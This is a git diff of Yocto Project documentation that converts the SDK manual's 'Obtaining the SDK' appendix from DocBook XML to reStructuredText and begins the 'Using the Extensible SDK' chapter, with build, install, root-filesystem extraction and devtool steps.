+ in the Yocto Project Development Tasks Manual for information on how
+ to get a build host ready that is either a native Linux machine or a
+ machine that uses CROPS.
+
+2. *Clone the ``poky`` Repository:* You need to have a local copy of the
+ Yocto Project :term:`Source Directory`
+ (i.e. a local
+ ``poky`` repository). See the ":ref:`dev-manual/dev-manual-start:cloning the \`\`poky\`\` repository`" and
+ possibly the ":ref:`dev-manual/dev-manual-start:checking out by branch in poky`" and
+ ":ref:`checkout-out-by-tag-in-poky`" sections
+ all in the Yocto Project Development Tasks Manual for information on
+ how to clone the ``poky`` repository and check out the appropriate
+ branch for your work.
+
+3. *Initialize the Build Environment:* While in the root directory of
+ the Source Directory (i.e. ``poky``), run the
+ :ref:`structure-core-script` environment
+ setup script to define the OpenEmbedded build environment on your
+ build host.
+ ::
+
+ $ source oe-init-build-env
+
+ Among other things, the script
+ creates the :term:`Build Directory`,
+ which is
+ ``build`` in this case and is located in the Source Directory. After
+ the script runs, your current working directory is set to the
+ ``build`` directory.
+
+4. *Make Sure You Are Building an Installer for the Correct Machine:*
+ Check to be sure that your
+ :term:`MACHINE` variable in the
+ ``local.conf`` file in your Build Directory matches the architecture
+ for which you are building.
+
+5. *Make Sure Your SDK Machine is Correctly Set:* If you are building a
+ toolchain designed to run on an architecture that differs from your
+ current development host machine (i.e. the build host), be sure that
+ the :term:`SDKMACHINE` variable
+ in the ``local.conf`` file in your Build Directory is correctly set.
+
+ .. note::
+
+ If you are building an SDK installer for the Extensible SDK, the
+ SDKMACHINE
+ value must be set for the architecture of the machine you are
+ using to build the installer. If
+ SDKMACHINE
+ is not set appropriately, the build fails and provides an error
+ message similar to the following:
+ ::
+
+ The extensible SDK can currently only be built for the same architecture as the machine being built on - SDK_ARCH is
+ set to i686 (likely via setting SDKMACHINE) which is different from the architecture of the build machine (x86_64).
+ Unable to continue.
+
+
+6. *Build the SDK Installer:* To build the SDK installer for a standard
+ SDK and populate the SDK image, use the following command form. Be
+ sure to replace image with an image (e.g. "core-image-sato"): $
+ bitbake image -c populate_sdk You can do the same for the extensible
+ SDK using this command form:
+ ::
+
+ $ bitbake image -c populate_sdk_ext
+
+ These commands produce an SDK installer that contains the sysroot
+ that matches your target root filesystem.
+
+ When the ``bitbake`` command completes, the SDK installer will be in
+ ``tmp/deploy/sdk`` in the Build Directory.
+
+ .. note::
+
+ - By default, the previous BitBake command does not build static
+ binaries. If you want to use the toolchain to build these types
+ of libraries, you need to be sure your SDK has the appropriate
+ static development libraries. Use the
+ :term:`TOOLCHAIN_TARGET_TASK`
+ variable inside your ``local.conf`` file before building the
+ SDK installer. Doing so ensures that the eventual SDK
+ installation process installs the appropriate library packages
+ as part of the SDK. Following is an example using ``libc``
+ static development libraries: TOOLCHAIN_TARGET_TASK_append = "
+ libc-staticdev"
+
+7. *Run the Installer:* You can now run the SDK installer from
+ ``tmp/deploy/sdk`` in the Build Directory. Following is an example:
+ ::
+
+ $ cd ~/poky/build/tmp/deploy/sdk
+ $ ./poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-DISTRO.sh
+
+ During execution of the script, you choose the root location for the
+ toolchain. See the "`Installed Standard SDK Directory
+ Structure <#sdk-installed-standard-sdk-directory-structure>`__"
+ section and the "`Installed Extensible SDK Directory
+ Structure <#sdk-installed-extensible-sdk-directory-structure>`__"
+ section for more information.
+
+Extracting the Root Filesystem
+==============================
+
+After installing the toolchain, for some use cases you might need to
+separately extract a root filesystem:
+
+- You want to boot the image using NFS.
+
+- You want to use the root filesystem as the target sysroot.
+
+- You want to develop your target application using the root filesystem
+ as the target sysroot.
+
+Follow these steps to extract the root filesystem:
+
+1. *Locate and Download the Tarball for the Pre-Built Root Filesystem
+ Image File:* You need to find and download the root filesystem image
+ file that is appropriate for your target system. These files are kept
+ in machine-specific folders in the
+ :yocto_dl:`Index of Releases </releases/yocto/yocto-3.1.2/machines/>`
+ in the "machines" directory.
+
+ The machine-specific folders of the "machines" directory contain
+ tarballs (``*.tar.bz2``) for supported machines. These directories
+ also contain flattened root filesystem image files (``*.ext4``),
+ which you can use with QEMU directly.
+
+ The pre-built root filesystem image files follow these naming
+ conventions:
+ ::
+
+ core-image-profile-arch.tar.bz2
+
+ Where:
+ profile is the filesystem image's profile:
+ lsb, lsb-dev, lsb-sdk, minimal, minimal-dev, minimal-initramfs,
+ sato, sato-dev, sato-sdk, sato-sdk-ptest. For information on
+ these types of image profiles, see the "Images" chapter in
+ the Yocto Project Reference Manual.
+
+ arch is a string representing the target architecture:
+ beaglebone-yocto, beaglebone-yocto-lsb, edgerouter, edgerouter-lsb,
+ genericx86, genericx86-64, genericx86-64-lsb, genericx86-lsb and qemu*.
+
+ The root filesystems
+ provided by the Yocto Project are based off of the
+ ``core-image-sato`` and ``core-image-minimal`` images.
+
+ For example, if you plan on using a BeagleBone device as your target
+ hardware and your image is a ``core-image-sato-sdk`` image, you can
+ download the following file:
+ ::
+
+ core-image-sato-sdk-beaglebone-yocto.tar.bz2
+
+2. *Initialize the Cross-Development Environment:* You must ``source``
+ the cross-development environment setup script to establish necessary
+ environment variables.
+
+ This script is located in the top-level directory in which you
+ installed the toolchain (e.g. ``poky_sdk``).
+
+ Following is an example based on the toolchain installed in the
+ ":ref:`sdk-locating-pre-built-sdk-installers`" section:
+ ::
+
+ $ source ~/poky_sdk/environment-setup-core2-64-poky-linux
+
+3. *Extract the Root Filesystem:* Use the ``runqemu-extract-sdk``
+ command and provide the root filesystem image.
+
+ Following is an example command that extracts the root filesystem
+ from a previously built root filesystem image that was downloaded
+ from the :yocto_dl:`Index of Releases </releases/yocto/yocto-3.1.2/machines/>`.
+ This command extracts the root filesystem into the ``core2-64-sato``
+ directory:
+ ::
+
+ $ runqemu-extract-sdk ~/Downloads/core-image-sato-sdk-beaglebone-yocto.tar.bz2 ~/beaglebone-sato
+
+ You could now point to the target sysroot at ``beablebone-sato``.
+
+Installed Standard SDK Directory Structure
+==========================================
+
+The following figure shows the resulting directory structure after you
+install the Standard SDK by running the ``*.sh`` SDK installation
+script:
+
+.. image:: figures/sdk-installed-standard-sdk-directory.png
+ :scale: 80%
+ :align: center
+
+The installed SDK consists of an environment setup script for the SDK, a
+configuration file for the target, a version file for the target, and
+the root filesystem (``sysroots``) needed to develop objects for the
+target system.
+
+Within the figure, italicized text is used to indicate replaceable
+portions of the file or directory name. For example, install_dir/version
+is the directory where the SDK is installed. By default, this directory
+is ``/opt/poky/``. And, version represents the specific snapshot of the
+SDK (e.g. 3.1.2). Furthermore, target represents the target architecture
+(e.g. ``i586``) and host represents the development system's
+architecture (e.g. ``x86_64``). Thus, the complete names of the two
+directories within the ``sysroots`` could be ``i586-poky-linux`` and
+``x86_64-pokysdk-linux`` for the target and host, respectively.
+
+Installed Extensible SDK Directory Structure
+============================================
+
+The following figure shows the resulting directory structure after you
+install the Extensible SDK by running the ``*.sh`` SDK installation
+script:
+
+.. image:: figures/sdk-installed-extensible-sdk-directory.png
+ :scale: 80%
+ :align: center
+
+The installed directory structure for the extensible SDK is quite
+different than the installed structure for the standard SDK. The
+extensible SDK does not separate host and target parts in the same
+manner as does the standard SDK. The extensible SDK uses an embedded
+copy of the OpenEmbedded build system, which has its own sysroots.
+
+Of note in the directory structure are an environment setup script for
+the SDK, a configuration file for the target, a version file for the
+target, and log files for the OpenEmbedded build system preparation
+script run by the installer and BitBake.
+
+Within the figure, italicized text is used to indicate replaceable
+portions of the file or directory name. For example, install_dir is the
+directory where the SDK is installed, which is ``poky_sdk`` by default,
+and target represents the target architecture (e.g. ``i586``).
diff --git a/documentation/sdk-manual/sdk-appendix-obtain.xml b/documentation/sdk-manual/sdk-appendix-obtain.xml
deleted file mode 100644
index 86b6d7dd07..0000000000
--- a/documentation/sdk-manual/sdk-appendix-obtain.xml
+++ /dev/null
@@ -1,443 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<appendix id='sdk-appendix-obtain'>
-
-<title>Obtaining the SDK</title>
-
-<section id='sdk-locating-pre-built-sdk-installers'>
- <title>Locating Pre-Built SDK Installers</title>
-
- <para>
- You can use existing, pre-built toolchains by locating and running
- an SDK installer script that ships with the Yocto Project.
- Using this method, you select and download an architecture-specific
- SDK installer and then run the script to hand-install the
- toolchain.
- </para>
-
- <para>
- Follow these steps to locate and hand-install the toolchain:
- <orderedlist>
- <listitem><para>
- <emphasis>Go to the Installers Directory:</emphasis>
- Go to <ulink url='&YOCTO_TOOLCHAIN_DL_URL;'></ulink>
- </para></listitem>
- <listitem><para>
- <emphasis>Open the Folder for Your Build Host:</emphasis>
- Open the folder that matches your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>build host</ulink>
- (i.e. <filename>i686</filename> for 32-bit machines or
- <filename>x86_64</filename> for 64-bit machines).
- </para></listitem>
- <listitem><para>
- <emphasis>Locate and Download the SDK Installer:</emphasis>
- You need to find and download the installer appropriate for
- your build host, target hardware, and image type.
- </para>
-
- <para>The installer files (<filename>*.sh</filename>) follow
- this naming convention:
- <literallayout class='monospaced'>
- poky-glibc-<replaceable>host_system</replaceable>-core-image-<replaceable>type</replaceable>-<replaceable>arch</replaceable>-toolchain[-ext]-<replaceable>release</replaceable>.sh
-
- Where:
- <replaceable>host_system</replaceable> is a string representing your development system:
- "i686" or "x86_64"
-
- <replaceable>type</replaceable> is a string representing the image:
- "sato" or "minimal"
-
- <replaceable>arch</replaceable> is a string representing the target architecture:
- "aarch64", "armv5e", "core2-64", "coretexa8hf-neon", "i586", "mips32r2",
- "mips64", or "ppc7400"
-
- <replaceable>release</replaceable> is the version of Yocto Project.
-
- NOTE:
- The standard SDK installer does not have the "-ext" string as
- part of the filename.
-
- </literallayout>
- The toolchains provided by the Yocto Project are based off of
- the <filename>core-image-sato</filename> and
- <filename>core-image-minimal</filename> images and contain
- libraries appropriate for developing against those images.
- </para>
-
- <para>For example, if your build host is a 64-bit x86 system
- and you need an extended SDK for a 64-bit core2 target, go
- into the <filename>x86_64</filename> folder and download the
- following installer:
- <literallayout class='monospaced'>
- poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-&DISTRO;.sh
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Run the Installer:</emphasis>
- Be sure you have execution privileges and run the installer.
- Following is an example from the <filename>Downloads</filename>
- directory:
- <literallayout class='monospaced'>
- $ ~/Downloads/poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-&DISTRO;.sh
- </literallayout>
- During execution of the script, you choose the root location
- for the toolchain.
- See the
- "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
- section and the
- "<link linkend='sdk-installed-extensible-sdk-directory-structure'>Installed Extensible SDK Directory Structure</link>"
- section for more information.
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id='sdk-building-an-sdk-installer'>
- <title>Building an SDK Installer</title>
-
- <para>
- As an alternative to locating and downloading an SDK installer,
- you can build the SDK installer.
- Follow these steps:
- <orderedlist>
- <listitem><para>
- <emphasis>Set Up the Build Environment:</emphasis>
- Be sure you are set up to use BitBake in a shell.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
- section in the Yocto Project Development Tasks Manual for
- information on how to get a build host ready that is either a
- native Linux machine or a machine that uses CROPS.
- </para></listitem>
- <listitem><para>
- <emphasis>Clone the <filename>poky</filename> Repository:</emphasis>
- You need to have a local copy of the Yocto Project
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (i.e. a local <filename>poky</filename> repository).
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#cloning-the-poky-repository'>Cloning the <filename>poky</filename> Repository</ulink>"
- and possibly the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checking-out-by-branch-in-poky'>Checking Out by Branch in Poky</ulink>"
- and
- "<ulink url='&YOCTO_DOCS_DEV_URL;#checkout-out-by-tag-in-poky'>Checking Out by Tag in Poky</ulink>"
- sections all in the Yocto Project Development Tasks Manual for
- information on how to clone the <filename>poky</filename>
- repository and check out the appropriate branch for your work.
- </para></listitem>
- <listitem><para>
- <emphasis>Initialize the Build Environment:</emphasis>
- While in the root directory of the Source Directory (i.e.
- <filename>poky</filename>), run the
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>
- environment setup script to define the OpenEmbedded
- build environment on your build host.
- <literallayout class='monospaced'>
- $ source &OE_INIT_FILE;
- </literallayout>
- Among other things, the script creates the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- which is <filename>build</filename> in this case
- and is located in the Source Directory.
- After the script runs, your current working directory
- is set to the <filename>build</filename> directory.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Sure You Are Building an Installer for the Correct Machine:</emphasis>
- Check to be sure that your
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable in the <filename>local.conf</filename> file in your
- Build Directory matches the architecture for which you are
- building.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Sure Your SDK Machine is Correctly Set:</emphasis>
- If you are building a toolchain designed to run on an
- architecture that differs from your current development host
- machine (i.e. the build host), be sure that the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>
- variable in the <filename>local.conf</filename> file in your
- Build Directory is correctly set.
- <note>
- If you are building an SDK installer for the Extensible
- SDK, the <filename>SDKMACHINE</filename> value must be
- set for the architecture of the machine you are using to
- build the installer.
- If <filename>SDKMACHINE</filename> is not set appropriately,
- the build fails and provides an error message similar to
- the following:
- <literallayout class='monospaced'>
- The extensible SDK can currently only be built for the same architecture as the machine being built on - SDK_ARCH is
- set to i686 (likely via setting SDKMACHINE) which is different from the architecture of the build machine (x86_64).
- Unable to continue.
- </literallayout>
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Build the SDK Installer:</emphasis>
- To build the SDK installer for a standard SDK and populate
- the SDK image, use the following command form.
- Be sure to replace <replaceable>image</replaceable> with
- an image (e.g. "core-image-sato"):
- <literallayout class='monospaced'>
- $ bitbake <replaceable>image</replaceable> -c populate_sdk
- </literallayout>
- You can do the same for the extensible SDK using this command
- form:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>image</replaceable> -c populate_sdk_ext
- </literallayout>
- These commands produce an SDK installer that contains the
- sysroot that matches your target root filesystem.</para>
-
- <para>When the <filename>bitbake</filename> command completes,
- the SDK installer will be in
- <filename>tmp/deploy/sdk</filename> in the Build Directory.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- By default, the previous BitBake command does not
- build static binaries.
- If you want to use the toolchain to build these
- types of libraries, you need to be sure your SDK
- has the appropriate static development libraries.
- Use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TOOLCHAIN_TARGET_TASK'><filename>TOOLCHAIN_TARGET_TASK</filename></ulink>
- variable inside your <filename>local.conf</filename>
- file before building the SDK installer.
- Doing so ensures that the eventual SDK installation
- process installs the appropriate library packages
- as part of the SDK.
- Following is an example using
- <filename>libc</filename> static development
- libraries:
- <literallayout class='monospaced'>
- TOOLCHAIN_TARGET_TASK_append = " libc-staticdev"
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Run the Installer:</emphasis>
- You can now run the SDK installer from
- <filename>tmp/deploy/sdk</filename> in the Build Directory.
- Following is an example:
- <literallayout class='monospaced'>
- $ cd ~/poky/build/tmp/deploy/sdk
- $ ./poky-glibc-x86_64-core-image-sato-core2-64-toolchain-ext-&DISTRO;.sh
- </literallayout>
- During execution of the script, you choose the root location
- for the toolchain.
- See the
- "<link linkend='sdk-installed-standard-sdk-directory-structure'>Installed Standard SDK Directory Structure</link>"
- section and the
- "<link linkend='sdk-installed-extensible-sdk-directory-structure'>Installed Extensible SDK Directory Structure</link>"
- section for more information.
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id='sdk-extracting-the-root-filesystem'>
- <title>Extracting the Root Filesystem</title>
-
- <para>
- After installing the toolchain, for some use cases you
- might need to separately extract a root filesystem:
- <itemizedlist>
- <listitem><para>
- You want to boot the image using NFS.
- </para></listitem>
- <listitem><para>
- You want to use the root filesystem as the
- target sysroot.
- </para></listitem>
- <listitem><para>
- You want to develop your target application
- using the root filesystem as the target sysroot.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Follow these steps to extract the root filesystem:
- <orderedlist>
- <listitem><para>
- <emphasis>Locate and Download the Tarball for the Pre-Built
- Root Filesystem Image File:</emphasis>
- You need to find and download the root filesystem image
- file that is appropriate for your target system.
- These files are kept in machine-specific folders in the
- <ulink url='&YOCTO_DL_URL;/releases/yocto/yocto-&DISTRO;/machines/'>Index of Releases</ulink>
- in the "machines" directory.</para>
-
- <para>The machine-specific folders of the "machines" directory
- contain tarballs (<filename>*.tar.bz2</filename>) for supported
- machines.
- These directories also contain flattened root filesystem
- image files (<filename>*.ext4</filename>), which you can use
- with QEMU directly.</para>
-
- <para>The pre-built root filesystem image files
- follow these naming conventions:
- <literallayout class='monospaced'>
-<!--
- core-image-<replaceable>profile</replaceable>-<replaceable>arch</replaceable>-<replaceable>date_time</replaceable>.rootfs.tar.bz2
--->
- core-image-<replaceable>profile</replaceable>-<replaceable>arch</replaceable>.tar.bz2
-
- Where:
- <replaceable>profile</replaceable> is the filesystem image's profile:
- lsb, lsb-dev, lsb-sdk, minimal, minimal-dev, minimal-initramfs,
- sato, sato-dev, sato-sdk, sato-sdk-ptest. For information on
- these types of image profiles, see the "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>" chapter in
- the Yocto Project Reference Manual.
-
- <replaceable>arch</replaceable> is a string representing the target architecture:
- beaglebone-yocto, beaglebone-yocto-lsb, edgerouter, edgerouter-lsb,
- genericx86, genericx86-64, genericx86-64-lsb, genericx86-lsb and qemu*.
-
-<!-->
- <replaceable>date_time</replaceable> is a date and time stamp.
--->
-
- </literallayout>
- The root filesystems provided by the Yocto Project are based
- off of the <filename>core-image-sato</filename> and
- <filename>core-image-minimal</filename> images.
- </para>
-
- <para>For example, if you plan on using a BeagleBone device
- as your target hardware and your image is a
- <filename>core-image-sato-sdk</filename>
- image, you can download the following file:
- <literallayout class='monospaced'>
- core-image-sato-sdk-beaglebone-yocto.tar.bz2
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Initialize the Cross-Development Environment:</emphasis>
- You must <filename>source</filename> the cross-development
- environment setup script to establish necessary environment
- variables.</para>
-
- <para>This script is located in the top-level directory in
- which you installed the toolchain (e.g.
- <filename>poky_sdk</filename>).</para>
-
- <para>Following is an example based on the toolchain installed
- in the
- "<link linkend='sdk-locating-pre-built-sdk-installers'>Locating Pre-Built SDK Installers</link>"
- section:
- <literallayout class='monospaced'>
- $ source ~/poky_sdk/environment-setup-core2-64-poky-linux
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Extract the Root Filesystem:</emphasis>
- Use the <filename>runqemu-extract-sdk</filename> command
- and provide the root filesystem image.</para>
-
- <para>Following is an example command that extracts the root
- filesystem from a previously built root filesystem image that
- was downloaded from the
- <ulink url='&YOCTO_DOCS_OM_URL;#index-downloads'>Index of Releases</ulink>.
- This command extracts the root filesystem into the
- <filename>core2-64-sato</filename> directory:
- <literallayout class='monospaced'>
- $ runqemu-extract-sdk ~/Downloads/core-image-sato-sdk-beaglebone-yocto.tar.bz2 ~/beaglebone-sato
- </literallayout>
- You could now point to the target sysroot at
- <filename>beablebone-sato</filename>.
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id='sdk-installed-standard-sdk-directory-structure'>
- <title>Installed Standard SDK Directory Structure</title>
-
- <para>
- The following figure shows the resulting directory structure after
- you install the Standard SDK by running the <filename>*.sh</filename>
- SDK installation script:
- </para>
-
- <para>
- <imagedata fileref="figures/sdk-installed-standard-sdk-directory.png" scale="80" align="center" />
- </para>
-
- <para>
- The installed SDK consists of an environment setup script for the SDK,
- a configuration file for the target, a version file for the target,
- and the root filesystem (<filename>sysroots</filename>) needed to
- develop objects for the target system.
- </para>
-
- <para>
- Within the figure, italicized text is used to indicate replaceable
- portions of the file or directory name.
- For example,
- <replaceable>install_dir</replaceable>/<replaceable>version</replaceable>
- is the directory where the SDK is installed.
- By default, this directory is <filename>/opt/poky/</filename>.
- And, <replaceable>version</replaceable> represents the specific
- snapshot of the SDK (e.g. <filename>&DISTRO;</filename>).
- Furthermore, <replaceable>target</replaceable> represents the target
- architecture (e.g. <filename>i586</filename>) and
- <replaceable>host</replaceable> represents the development system's
- architecture (e.g. <filename>x86_64</filename>).
- Thus, the complete names of the two directories within the
- <filename>sysroots</filename> could be
- <filename>i586-poky-linux</filename> and
- <filename>x86_64-pokysdk-linux</filename> for the target and host,
- respectively.
- </para>
-</section>
-
-<section id='sdk-installed-extensible-sdk-directory-structure'>
- <title>Installed Extensible SDK Directory Structure</title>
-
- <para>
- The following figure shows the resulting directory structure after
- you install the Extensible SDK by running the <filename>*.sh</filename>
- SDK installation script:
- </para>
-
- <para>
- <imagedata fileref="figures/sdk-installed-extensible-sdk-directory.png" scale="80" align="center" />
- </para>
-
- <para>
- The installed directory structure for the extensible SDK is quite
- different than the installed structure for the standard SDK.
- The extensible SDK does not separate host and target parts in the
- same manner as does the standard SDK.
- The extensible SDK uses an embedded copy of the OpenEmbedded
- build system, which has its own sysroots.
- </para>
-
- <para>
- Of note in the directory structure are an environment setup script
- for the SDK, a configuration file for the target, a version file for
- the target, and log files for the OpenEmbedded build system
- preparation script run by the installer and BitBake.
- </para>
-
- <para>
- Within the figure, italicized text is used to indicate replaceable
- portions of the file or directory name.
- For example,
- <replaceable>install_dir</replaceable> is the directory where the SDK
- is installed, which is <filename>poky_sdk</filename> by default, and
- <replaceable>target</replaceable> represents the target
- architecture (e.g. <filename>i586</filename>).
- </para>
-</section>
-
-</appendix>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/sdk-manual/sdk-extensible.rst b/documentation/sdk-manual/sdk-extensible.rst
new file mode 100644
index 0000000000..5ff75ada26
--- /dev/null
+++ b/documentation/sdk-manual/sdk-extensible.rst
@@ -0,0 +1,1356 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+************************
+Using the Extensible SDK
+************************
+
+This chapter describes the extensible SDK and how to install it.
+Information covers the pieces of the SDK, how to install it, and
+presents a look at using the ``devtool`` functionality. The extensible
+SDK makes it easy to add new applications and libraries to an image,
+modify the source for an existing component, test changes on the target
+hardware, and ease integration into the rest of the
+:term:`OpenEmbedded Build System`.
+
+.. note::
+
+ For a side-by-side comparison of main features supported for an
+ extensible SDK as compared to a standard SDK, see the "
+ Introduction
+ " section.
+
+In addition to the functionality available through ``devtool``, you can
+alternatively make use of the toolchain directly, for example from
+Makefile and Autotools. See the "`Using the SDK Toolchain
+Directly <#sdk-working-projects>`__" chapter for more information.
+
+.. _sdk-extensible-sdk-intro:
+
+Why use the Extensible SDK and What is in It?
+=============================================
+
+The extensible SDK provides a cross-development toolchain and libraries
+tailored to the contents of a specific image. You would use the
+Extensible SDK if you want a toolchain experience supplemented with the
+powerful set of ``devtool`` commands tailored for the Yocto Project
+environment.
+
+The installed extensible SDK consists of several files and directories.
+Basically, it contains an SDK environment setup script, some
+configuration files, an internal build system, and the ``devtool``
+functionality.
+
+.. _sdk-installing-the-extensible-sdk:
+
+Installing the Extensible SDK
+=============================
+
+The first thing you need to do is install the SDK on your :term:`Build
+Host` by running the ``*.sh`` installation script.
+
+You can download a tarball installer, which includes the pre-built
+toolchain, the ``runqemu`` script, the internal build system,
+``devtool``, and support files from the appropriate
+:yocto_dl:`toolchain </releases/yocto/yocto-3.1.2/toolchain/>` directory within the Index of
+Releases. Toolchains are available for several 32-bit and 64-bit
+architectures with the ``x86_64`` directories, respectively. The
+toolchains the Yocto Project provides are based off the
+``core-image-sato`` and ``core-image-minimal`` images and contain
+libraries appropriate for developing against that image.
+
+The names of the tarball installer scripts are such that a string
+representing the host system appears first in the filename and then is
+immediately followed by a string representing the target architecture.
+An extensible SDK has the string "-ext" as part of the name. Following
+is the general form:
+::
+
+ poky-glibc-host_system-image_type-arch-toolchain-ext-release_version.sh
+
+ Where:
+ host_system is a string representing your development system:
+
+ i686 or x86_64.
+
+ image_type is the image for which the SDK was built:
+
+ core-image-sato or core-image-minimal
+
+ arch is a string representing the tuned target architecture:
+
+ aarch64, armv5e, core2-64, i586, mips32r2, mips64, ppc7400, or cortexa8hf-neon
+
+ release_version is a string representing the release number of the Yocto Project:
+
+ 3.1.2, 3.1.2+snapshot
+
+For example, the following SDK installer is for a 64-bit
+development host system and a i586-tuned target architecture based off
+the SDK for ``core-image-sato`` and using the current DISTRO snapshot:
+::
+
+ poky-glibc-x86_64-core-image-sato-i586-toolchain-ext-DISTRO.sh
+
+.. note::
+
+ As an alternative to downloading an SDK, you can build the SDK
+ installer. For information on building the installer, see the "
+ Building an SDK Installer
+ " section.
+
+The SDK and toolchains are self-contained and by default are installed
+into the ``poky_sdk`` folder in your home directory. You can choose to
+install the extensible SDK in any location when you run the installer.
+However, because files need to be written under that directory during
+the normal course of operation, the location you choose for installation
+must be writable for whichever users need to use the SDK.
+
+The following command shows how to run the installer given a toolchain
+tarball for a 64-bit x86 development host system and a 64-bit x86 target
+architecture. The example assumes the SDK installer is located in
+``~/Downloads/`` and has execution rights.
+
+.. note::
+
+ If you do not have write permissions for the directory into which you
+ are installing the SDK, the installer notifies you and exits. For
+ that case, set up the proper permissions in the directory and run the
+ installer again.
+
+::
+
+ $ ./Downloads/poky-glibc-x86_64-core-image-minimal-core2-64-toolchain-ext-2.5.sh
+ Poky (Yocto Project Reference Distro) Extensible SDK installer version 2.5
+ ==========================================================================
+ Enter target directory for SDK (default: ~/poky_sdk):
+ You are about to install the SDK to "/home/scottrif/poky_sdk". Proceed [Y/n]? Y
+ Extracting SDK..............done
+ Setting it up...
+ Extracting buildtools...
+ Preparing build system...
+ Parsing recipes: 100% |##################################################################| Time: 0:00:52
+ Initialising tasks: 100% |###############################################################| Time: 0:00:00
+ Checking sstate mirror object availability: 100% |#######################################| Time: 0:00:00
+ Loading cache: 100% |####################################################################| Time: 0:00:00
+ Initialising tasks: 100% |###############################################################| Time: 0:00:00
+ done
+ SDK has been successfully set up and is ready to be used.
+ Each time you wish to use the SDK in a new shell session, you need to source the environment setup script e.g.
+ $ . /home/scottrif/poky_sdk/environment-setup-core2-64-poky-linux
+
+.. _sdk-running-the-extensible-sdk-environment-setup-script:
+
+Running the Extensible SDK Environment Setup Script
+===================================================
+
+Once you have the SDK installed, you must run the SDK environment setup
+script before you can actually use the SDK. This setup script resides in
+the directory you chose when you installed the SDK, which is either the
+default ``poky_sdk`` directory or the directory you chose during
+installation.
+
+Before running the script, be sure it is the one that matches the
+architecture for which you are developing. Environment setup scripts
+begin with the string "``environment-setup``" and include as part of
+their name the tuned target architecture. As an example, the following
+commands set the working directory to where the SDK was installed and
+then source the environment setup script. In this example, the setup
+script is for an IA-based target machine using i586 tuning:
+::
+
+ $ cd /home/scottrif/poky_sdk
+ $ source environment-setup-core2-64-poky-linux
+ SDK environment now set up; additionally you may now run devtool to perform development tasks.
+ Run devtool --help for further details.
+
+Running the setup script defines many environment variables needed in
+order to use the SDK (e.g. ``PATH``,
+:term:`CC`,
+:term:`LD`, and so forth). If you want to
+see all the environment variables the script exports, examine the
+installation file itself.
+
+Using ``devtool`` in Your SDK Workflow
+======================================
+
+The cornerstone of the extensible SDK is a command-line tool called
+``devtool``. This tool provides a number of features that help you
+build, test and package software within the extensible SDK, and
+optionally integrate it into an image built by the OpenEmbedded build
+system.
+
+.. note::
+
+ The use of
+ devtool
+ is not limited to the extensible SDK. You can use
+ devtool
+ to help you easily develop any project whose build output must be
+ part of an image built using the build system.
+
+The ``devtool`` command line is organized similarly to
+:ref:`overview-manual/overview-manual-development-environment:git` in that it has a number of
+sub-commands for each function. You can run ``devtool --help`` to see
+all the commands.
+
+.. note::
+
+ See the "
+ devtool
+  Quick Reference
+ " in the Yocto Project Reference Manual for a
+ devtool
+ quick reference.
+
+Three ``devtool`` subcommands exist that provide entry-points into
+development:
+
+- *devtool add*: Assists in adding new software to be built.
+
+- *devtool modify*: Sets up an environment to enable you to modify
+ the source of an existing component.
+
+- *devtool upgrade*: Updates an existing recipe so that you can
+ build it for an updated set of source files.
+
+As with the build system, "recipes" represent software packages within
+``devtool``. When you use ``devtool add``, a recipe is automatically
+created. When you use ``devtool modify``, the specified existing recipe
+is used in order to determine where to get the source code and how to
+patch it. In both cases, an environment is set up so that when you build
+the recipe a source tree that is under your control is used in order to
+allow you to make changes to the source as desired. By default, new
+recipes and the source go into a "workspace" directory under the SDK.
+
+The remainder of this section presents the ``devtool add``,
+``devtool modify``, and ``devtool upgrade`` workflows.
+
+.. _sdk-use-devtool-to-add-an-application:
+
+Use ``devtool add`` to Add an Application
+-----------------------------------------
+
+The ``devtool add`` command generates a new recipe based on existing
+source code. This command takes advantage of the
+:ref:`devtool-the-workspace-layer-structure`
+layer that many ``devtool`` commands use. The command is flexible enough
+to allow you to extract source code into both the workspace or a
+separate local Git repository and to use existing code that does not
+need to be extracted.
+
+Depending on your particular scenario, the arguments and options you use
+with ``devtool add`` form different combinations. The following diagram
+shows common development flows you would use with the ``devtool add``
+command:
+
+.. image:: figures/sdk-devtool-add-flow.png
+ :align: center
+
+1. *Generating the New Recipe*: The top part of the flow shows three
